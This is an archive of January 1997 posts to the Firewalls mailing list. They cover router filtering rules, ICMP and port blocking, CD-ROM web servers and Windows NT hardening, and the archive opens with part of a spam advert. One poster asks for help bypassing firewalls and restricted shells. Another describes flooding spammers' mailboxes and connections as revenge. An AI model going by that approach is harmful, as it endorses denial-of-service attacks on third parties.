printer. CheckRite 2000 provides the software to allow printing of laser checks from a PC or Mainframe computer without having to buy MS-ACCESS, dBase or other software. Each laser check is numbered when the printing occurs and is easily audited with your accounting program. Features of the CheckRite 2000 * Password security * Scanned signatures and logos are printed as part of the check * Account Screen maintains company and bank detail * Print blank checks and check books * Issue checks on demand for numerous companies and accounts * Import Text/ASCII data into CheckRite 2000 database * Historical log of checks printed with all details stored * Print checks on Laser Bond check paper or standard laser paper Printerm offers full support services to get your laser check printing operational ** MICR toner and HP LaserJet MICR printing Kits are also available from Printerm. For further information please contact: Charles Katz:Printerm Datascribe,Inc.| printerm@softcell.net 300 Pearl St., suite 200 | voice:716-842-3099 Buffalo,NY 14202 | Fax: 716-842-6049 WEB Site: http://bisinc.com/printerm/ Download a Free Demo now!!!!! From firewalls-owner Wed Jan 8 19:15:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA12143 for firewalls-outgoing; Wed, 8 Jan 1997 19:04:02 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA12125 for ; Wed, 8 Jan 1997 19:03:33 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0viAle-0004FTC (Debian Smail-3.2 1996-Jul-4 #2); Thu, 9 Jan 1997 04:02:58 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Thu, 9 Jan 97 04:02 MET Received: by lina id m0viAf1-0004j2C (Debian Smail-3.2 1996-Jul-4 #2); Thu, 9 Jan 1997 03:56:07 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: internal filtering router - filter config? To: uscny8hb@ibmmail.com Date: Thu, 9 Jan 1997 03:56:06 +0100 (MET) Cc: Firewalls@GreatCircle.COM In-Reply-To: <32D3A3BF.5D36@dreamscape.com> from "Steven E. Matkoski" at Jan 8, 97 08:40:15 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > Thanks, I also read that you could block source-routed packets there, > also. You should block them on the external router to protect your DMZ from spoofing attacks. Usually an external (in front of DMZ/firewall) and an internal (after DMZ/firewall) filtering router will do the following (apart from routing of course :) external: spoof protection DMZ protection internal spoof protection internal net protection snoop protection from DMZ/firewall with: spoof protection is block all packets with source address from inside on external interface block all packets with source address not from inside on internal interface block all reserved/not-routed networks block all unusual packages like broadcast and multicast and source routed block all oversized packages or broken packages DMZ protection is allow only connections to sudden ports of the DMZ/firewall hosts internal net protection is allow only connections to sudden/no ports of internal hosts optionally allow all outgoing connections snoop protection dont let any internal->internal packets reach the DMZ/firewall his are the general usage for those routers. Of course you can add additional task or leave some out, depending on your local security policy. > If I am using a cisco router, how does on go about this? or can I get a > location for documentation. www.cisco.com and the CD which is deliveerd with your cisco router. Greetings Bernd -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From firewalls-owner Wed Jan 8 23:43:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA26270 for firewalls-outgoing; Wed, 8 Jan 1997 23:15:48 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24956 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:54:48 -0800 (PST) Received: from www.biella.alpcom.it (www.biella.alpcom.it [194.243.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06301 for ; Tue, 7 Jan 1997 12:28:18 -0800 (PST) From: uskanbye@ibmmail.com Received: from ferraris.biella.alpcom.it by www.biella.alpcom.it; (5.65v3.2/1.1.8.2/05Mar96-0237PM) id AA23214; Tue, 7 Jan 1997 21:29:03 +0100 X-Mailer: XFMail 1.0 [p0] on Linux Received: from relay3.UU.NET by www.biella.alpcom.it; (5.65v3.2/1.1.8.2/05Mar96-0237PM) id AA32132; Mon, 6 Jan 1997 08:33:09 +0100 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbxhe04920; Mon, 6 Jan 1997 02:30:36 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA09504 for firewalls-outgoing; Sun, 5 Jan 1997 21:52:20 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id VAA09470 for firewalls@greatcircle.com; Sun, 5 Jan 1997 21:51:49 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA17474 for ; Tue, 31 Dec 1996 13:01:58 -0800 (PST) X-Uidl: 852547705.003 Message-Id: Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 3767; Tue, 31 Dec 96 16:01:20 EST Date: Tue, 31 Dec 1996 16:00:41 EST X-Sender-Info: Mitchell Ummel CSP CCP, KDHE Network Manager Office of Information Systems, Tech Services Section Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit To: firewalls@greatcircle.com Subject: Re: Air Force Web Site Hacked Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't agree with premise that a CD-ROM based WWW server is a viable option. Unless your web site is very static (no databases, no HTML generation, no frequent updates?), this would be cumbersome indeed, and still NO guarantee against hacking. Case in point... unless your DNS server is also "CD-ROM based" as well (a silly proposition), a hacker can always point your WWW server domain name to another "hacked" IP address. Physical read-only storage may offer SOME protection, but still not hackproof (not to mention the probable performance penalty you'd pay for optical). ----------------WWW.INK.ORG\PUBLIC\KDHE------------------- --------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT--------- ----------Mills Bldg Suite 501 Topeka, KS 66612----------- ---------Phone (913) 296-5643 FAX (913) 296-8943---------- *** Forwarding note from I5004693--IBMMAIL 12/31/96 15:42 *** Date: Tue, 31 Dec 1996 11:41:27 -0800 From: Mark Johnson To: Dale Drew CC: Michael Idengren , Christopher Klaus , firewalls@GreatCircle.COM Subject: Re: Air Force Web Site Hacked Dale Drew wrote: > > I don't see how CDROM provides significant advantages on a WEB server > "graffiti" attack. > > Using a CDROM web-server doesn't provide resistance to an > attacker who gains access to the system as ROOT (or the user that owns > the http process), and the system has some form of (or access to) > writable media available. > > The attacker just repoints the httpd root tree to the writable media (eg; > "/tmp") and away from the CDROM. > > http://www.security.mci.net > =============================================================== > Dale Drew MCI Telecommunications > Sr. Manager internetMCI Security > Engineering > Voice: 703/715-7058 Internet: ddrew@mci.net > Fax: 703/715-7066 MCIMAIL: Dale_Drew/644-3335 > > At 11:57 PM 12/30/96 -0500, Michael Idengren wrote: > >I don't know about the rest of you but I agree with the idea of putting a > >webserver on a CD-ROM. I think the government can afford to write a new > >CD every time they need to update someone's email address anyways :) > > > >Mike Idengren | MEISTER > >---------------------------------+---------------------------------- > >Center for Information Technology| Alachua Free-Net IRC Administrator > >Stetson University | WorldWide Free-Net IRC Network Coordinator > > > > > > > > > > I have not set one up yet(Planned for July), but I believe you can have a totally CDROM machine, at least using Novell or NT. Bootable CDROMs and all data on CDROM so you would not have any writable media. Can anyone confirm of deny my thoughts? Mark -- Mark Johnson Network Project Manager St. Mary's Regional Med Ctr mark@hercules.reno.nv.us ---- End of mail text Additional SMTP headers from original mail item follow: Received: from relay1.UU.NET by ibmmail.COM (IBM VM SMTP V2R3) with TCP; Tue, 31 Dec 96 15:43:03 EST Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbwna15264; Tue, 31 Dec 1996 15:42:24 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-9604 17-1) id LAA12757 for firewalls-outgoing; Tue, 31 Dec 1996 11:35:24 -0800 (PST) Received: from heather.greatbasin.com (heather.greatbasin.com [140.174.194.41]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA12750 for ; Tue, 31 Dec 1996 11:35:17 -0800 (PST) Received: from marks (hercules.reno.nv.us [204.94.161.224]) by heather.greatbas in.com (8.8.4/8.7.3) with SMTP id LAA14508; Tue, 31 Dec 1996 11:34:30 -0800 (PS T) Message-ID: <32C96C67.7D78@hercules.reno.nv.us> X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 References: <3.0.32.19961231124626.007717e4@166.45.1.38> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 8 23:44:41 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24931 for firewalls-outgoing; Wed, 8 Jan 1997 22:54:09 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24838 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:53:23 -0800 (PST) Received: from id.co.zw (a3-jhb-65.dial-up.net [196.26.216.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA24866 for ; Tue, 7 Jan 1997 08:18:08 -0800 (PST) Received: from miller.id.co.zw ([196.33.153.100]) by id.co.zw (8.6.11/8.6.9) with ESMTP id SAA13975 for ; Tue, 7 Jan 1997 18:15:08 +0200 Message-Id: <199701071615.SAA13975@id.co.zw> From: "Sean Miller" To: Subject: Help in any of the folowing if at all possible Date: Tue, 7 Jan 1997 16:05:01 +0200 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I need some help in getting through firewalls (and if anyone can on getting through shells with restriced acces or access denied) Please help. Mark From firewalls-owner Wed Jan 8 23:48:54 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24886 for firewalls-outgoing; Wed, 8 Jan 1997 22:53:49 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24827 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:53:13 -0800 (PST) Received: from exch-bel1.attachmate.com (exch-bel1.attachmate.com [149.82.1.46]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA19840 for ; Tue, 7 Jan 1997 06:43:41 -0800 (PST) Received: by exch-bel1.attachmate.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFC65.DC2C2E40@exch-bel1.attachmate.com>; Tue, 7 Jan 1997 06:41:49 -0800 Message-ID: From: Darren Cromer To: "'Ricardo Alvarado'" , "'firewalls@GreatCircle.COM'" Subject: RE: internal filtering router - filter config? Date: Tue, 7 Jan 1997 06:41:49 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Why ICMP? Im curious what inherent risk that would present. I too am setting up a screening firewall, but I want to allow pings to traverse the external router. (any advice on how to filter all ICMP except pings?) >---------- >From: Ricardo Alvarado[SMTP:ralvarado@avantel.com.mx] >Sent: Friday, January 03, 1997 10:20 AM >To: firewalls@GreatCircle.COM >Subject: Re: internal filtering router - filter config? > >>What type of things would you filter on the internal router? or even >>the external router? I am going to be installing a firewall real soon >>and would really appreciate any help. >> >>-steve. >>matkoski@dreamscape.com > >In your external router you'd block any ICMP traffic going back and >forth, as well as any packets bearing one of your internal IP addresses, >as a source address, especially if these are going INTO your protected >network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill >any ports that your users will not be using, andl leave just mail, web, >ftp, etc. > >ricardo >ralvarado@avantel.com.mx > > From firewalls-owner Wed Jan 8 23:59:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24983 for firewalls-outgoing; Wed, 8 Jan 1997 22:55:10 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24964 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:54:56 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA08128 for ; Tue, 7 Jan 1997 13:07:50 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id NAA18072; Tue, 7 Jan 1997 13:06:34 -0800 Received: from cidexchange.infosel.com.mx(148.246.8.22) by mycroft via smap (V1.3mjr) id sma018063; Tue Jan 7 13:05:44 1997 Received: by cidexchange.infosel.com.mx with Microsoft Exchange (IMC 4.0.837.3) id <01BBFCAB.9DC681A0@cidexchange.infosel.com.mx>; Tue, 7 Jan 1997 15:01:09 -0600 Message-ID: From: =?iso-8859-1?Q?Jaime_Alberto_Botello_Cant=FA?= To: "'firewalls@GreatCircle.COM'" Cc: "'matkoski@dreamscape.com'" , "'Ricardo Alvarado'" Subject: RE: internal filtering router - filter config? Date: Tue, 7 Jan 1997 15:01:03 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve, Is very important to block any TCP traffic that come with the established flag off. This is very important for example if you have intranets to protect, in this case for example, you want to allow internal users to access web servers outside, but you don=B4t want = outside users access your intranet web, ftp, etc. Doing this you have to take some ftp things to consider, you may need to use FTP passive connections for your internal users access ftp servers outside. Look, if you want more information you may get Building Internet Firewalls (O'Reilly & Associates) at www.greatcircle.com. Hope this help. Jaime A Botello C Departamento de Redes y Telecomunicaciones Informaci=F3n Selectiva S.A. de C.V. Calzada San Pedro #507 Colonia Fuentes del Valle, C.P. 66220 Tel: (528) 318-8943 Fax: (528) 318-8981 email: jbotello@infosel.com.mx > > >-----Original Message----- >From: Ricardo Alvarado [SMTP:ralvarado@avantel.com.mx] >Sent: Viernes 3 de Enero de 1997 9:21 AM >To: firewalls@GreatCircle.COM >Subject: Re: internal filtering router - filter config? > >>What type of things would you filter on the internal router? or even >>the external router? I am going to be installing a firewall real soon >>and would really appreciate any help. >> >>-steve. >>matkoski@dreamscape.com > >In your external router you'd block any ICMP traffic going back and >forth, as well as any packets bearing one of your internal IP >addresses, >as a source address, especially if these are going INTO your protected >network. Also, kill telnets, fingers, snmp and snmp trap. Actually, >kill >any ports that your users will not be using, andl leave just mail, web, >ftp, etc. > >ricardo >ralvarado@avantel.com.mx > From firewalls-owner Thu Jan 9 02:14:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA07782 for firewalls-outgoing; Thu, 9 Jan 1997 01:57:53 -0800 (PST) Received: from dicsmss1.jrc.it (dicsmss1.jrc.it [139.191.1.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA07773 for ; Thu, 9 Jan 1997 01:57:41 -0800 (PST) Received: from ceo0912.jrc.it by dicsmss1.jrc.it (4.1/EB-950131-C) id AA03652; Thu, 9 Jan 97 11:03:03 +0100 Received: by ceo0912.jrc.it (SMI-8.6/SMI-SVR4) id KAA11431; Thu, 9 Jan 1997 10:53:28 +0100 Date: Thu, 9 Jan 1997 10:53:28 +0100 From: peter.maersk-moller@jrc.it (Peter Maersk-Moller) Message-Id: <199701090953.KAA11431@ceo0912.jrc.it> To: firewalls@GreatCircle.COM Subject: Re: CheckRite Laser Checks! Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Md5: ywYJvmMVYLzlS7KBP1+GRQ== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi firewall list subscribers. This is not firewall related but it is firewall mailing list related. There are probably a lot of people getting tired over these commercial offers mailed to you through mailing lists. Instead of trying to stop them how about allow them, but advertise that the price for using them for distributing commercial offers is something like $100.000 or what ever will be too expensive. If a company then uses others mailing list for commercial distribution they have to pay for the service, however you will probably need a court decision that allow you to charge a fee for companies using others mailing list. Does anybody know how the legal aspect of this is ? I mean, there are a lot of services I will have to pay for if I use them. Is it legal for a company to use a service setup by me without paying for it ? How do we create the legal grounds for charging companies that uses other peoples mailing lists for commercial junkmail distribution ? I used to trace down the sender of junkmail and filled their mailbox and congested their Internet connection or their ISP Internet connection. After that I usually used to find the bosses of the responsible for sending junkmail to explain how much dammage their employees have brought to their companies, but it seems there are to many incompetent loonies in the world. Regards Peter Maersk-Moller (Speaking for myself and nobody else) From firewalls-owner Thu Jan 9 05:44:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA13574 for firewalls-outgoing; Thu, 9 Jan 1997 05:37:44 -0800 (PST) Received: from ram-exch-ns1.ramstein (ram-exch-ns1.ramstein.af.mil [132.25.130.19]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA13567 for ; Thu, 9 Jan 1997 05:37:29 -0800 (PST) Received: by ram-exch-ns1.ramstein with Microsoft Exchange (IMC 4.0.837.3) id <01BBFE3A.C164AF20@ram-exch-ns1.ramstein>; Thu, 9 Jan 1997 14:38:18 +0100 Message-ID: From: Franke Albert 2 Lt USAFE CSS/SCBS To: "'firewalls@GreatCircle.com'" Subject: TCP WRAPPERS FOR DEC ALPHA RUNNING NT 4.0??? Date: Thu, 9 Jan 1997 14:38:16 +0100 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Thanks to everyone who responded to my last question. I got a lot of >people who suggested using TCP Wrappers to add another layer of >security. I did a lot of research (CERT etc), but only found TCP >Wrappers for UNIX machines. Does anyone know where I can find a TCP >Wrapper for a DEC Alpha (64 or 32 bit) running Windows NT 4.0? Thanks >for you help. > >Albert E. Franke, 2Lt, USAF >OIC, USAFE Web Tech Support 480-7905 > From firewalls-owner Thu Jan 9 06:29:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15381 for firewalls-outgoing; Thu, 9 Jan 1997 06:25:50 -0800 (PST) Received: from relay-11.mail.demon.net (relay-11.mail.demon.net [194.217.242.137]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA15374 for ; Thu, 9 Jan 1997 06:25:39 -0800 (PST) Received: from martel.demon.co.uk ([158.152.221.102]) by relay-10.mail.demon.net id aa1017462; 9 Jan 97 14:02 GMT Message-ID: Date: Thu, 9 Jan 1997 10:24:42 +0000 To: firewalls@greatcircle.com From: Ian Gresley-Jones Subject: Re: packet filtering on PPP interfaces In-Reply-To: <9701062217.AA04330@omsk.quadrix.com> MIME-Version: 1.0 X-Mailer: Turnpike Version 3.00 <5FNnYA8I4VwTBaSmGLF2KtVCy5> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <9701062217.AA04330@omsk.quadrix.com>, BVE writes > >I figured that someone would've answered this one by now, but I haven't seen a >message on the list.... > > Is anyone aware of ppp implementation that include packet filtering? Or of > (nit-based?) packet filtering implementations that could be applied to a > ppp interface under Solaris 1 (Solaris 1.2 to be exact)? > >I once set up Morningstar PPP (on SunOs 4.1.3u1) to protect a small Unix box >from the Internet. It was a while ago, so I don't remember all the details, >but it provided what (at the time) seemed like a fairly good set of features, >for that type of software. It was pretty simple to configure.... > >I don't know if it's good enough for your needs, but it's a place to start.... > I'd definitely recommend looking at Morningstar - you can get various docs from the Web/ftp site (either www.morningstar.com or the site referred to from there because the company was bought out late last year I believe). The filtering facilties are good and they've implemented many other options like CHAP authentication etc. Costs about USD750 IIRC. You can get a one month free trial. Go for it! Regards Ian #include I have no association with Morningstar or the current vendor of this product. ******************************************************************** * Ian Gresley-Jones ZZR600 * * ******************************************************************** From firewalls-owner Thu Jan 9 06:46:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA15576 for firewalls-outgoing; Thu, 9 Jan 1997 06:30:27 -0800 (PST) Received: from exp2.is.xpark.pmh.org (exphub.is.xpark.pmh.org [198.215.78.104]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA15569 for ; Thu, 9 Jan 1997 06:30:08 -0800 (PST) Received: from localhost by exp2.is.xpark.pmh.org (AIX 3.2/UCB 5.64/4.03) id AA22045; Thu, 9 Jan 1997 08:22:20 -0600 Message-Id: <32D4FF1B.6956@exphub.pmh.org> Date: Thu, 09 Jan 1997 08:22:19 -0600 From: "Cary Conover(IS) 13897" Organization: Parkland Memorial Hospital X-Mailer: Mozilla 3.01Gold (X11; I; AIX 2) Mime-Version: 1.0 To: Chris Pugrud Cc: "'Franke Albert 2 Lt USAFE CSS/SCBS'" , Firewalls Mailing list Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Pugrud wrote: > > This really as not as bad of a situation as it seems. Here are a few > pointers to vastly increasing the security of the system. This is not > the be all or end all of security. I am sure that there are more steps > that you can take to increase your security even more. Buyer Beware. > Your mileage may vary... > > Apply sp2 for Windows NT 4.0 > SP2 fixes several bugs in the OS and IIS > http://www.microsoft.com/ntserversupport/Default-SL.HTM > > The machine really should be used only for serving web pages. If you > can dedicate a singular machine, even a 486, to just tossing HTTP then > you can greatly increase the security. > Under Control Panel > Services, Only the following MUST be running for > a web server: > EventLog > FTP Publishing Service (optional) > Plug and Play (NT 4.0) > Workstation > World Wide Web Publishing Service > Only these services should be set "Automatic". All other services > should be set "manual." Be careful, your mileage may vary... > > Use IIS security > IIS has some built in allow/deny filtering based on IP address > Internet Service Manager > WWW Service Properties > Advanced TAB > > CGI/BIN is BAD (by default) > Remove scripts and the HTML Administrator if installed > Internet Service Manager > Directories > Ideally only "C:\InetPub\wwwroot" "" is listed. Remove all > others, especially any that you can not identify. > While you are there make sure to go to "logging" and set up logs > Also go c:\InetPub and set security > NT Explorer > C:\InetPub > right click > properties > security > > permissions > Replace Permissions on Subdirectories > Replace Permissions on Existing Files > Make Everyone Read (RX)(RX) > Make Administrator Full Control (All)(All) > Remove all others > This sets things up so that only the administrator can make changes > and they must be made from the machine. > > Use the OS security > NT 4.0 has basic packet filtering built in > Control Panel > Network > Protocols > TCP/IP > Properties > IP Address > > Advanced > Enable Security > Configure > Permit Only (TCP Ports) > Add > 80 (http) > Permit Only (UDP Ports) > (leave blank) > Permit Only (IP Protocols) > Add > 6 (TCP) > This really cuts down what the machine can do. If you need to surf > from the machine you may need to add 53 to UDP Ports.